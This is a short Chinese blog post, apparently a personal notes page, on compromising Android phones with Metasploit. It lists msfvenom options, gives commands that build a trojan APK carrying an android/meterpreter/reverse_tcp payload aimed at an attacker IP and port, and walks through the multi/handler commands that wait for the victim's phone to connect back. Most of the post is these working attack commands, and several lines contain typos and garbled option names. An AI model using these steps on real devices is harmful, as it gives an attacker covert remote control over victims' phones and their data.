canvas#live2dcanvas { border: 0 !important; left: 0; }

渗透 手机

msfvenom基本参数

msfvenom -h

-p ->指定payload

-1 ->列出所有可用项

-f ->指定文件输出格式

-e ->指定编码格式

-a ->选择架构平台

-o ->选择文件输出路径,包含文件名

-s ->指定生成的payload最大大小

-b ->避免使用的字符

-I ->指定编码次数

-c ->添加自己的shellcode

-xxxx.exc -k ->捆绑文件到xxx.cxc

生成apk
android:

msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻 击机IP LPORT=攻击机端口 -f apk -o payload.apk

eg: msfvenom -p android/meterpreter/reverse_tcp LHOST=XXXXXX LPORT=4444 R>/root/apk.apk

metasploit:

use exploit/multi/handler 加载模块

set payload android/meterpreter/reverse_tcp 选择Payload

set LHOST10.1.1.169这里的地址设置成我

们刚配置木马的IP地址

set LPORT4545这里的端口设置成刚才我们

配置木马所监听的端口

exploit 侵入中

posted on 2020-05-19 11:33  Pastの  阅读(335)  评论(0)    收藏  举报

导航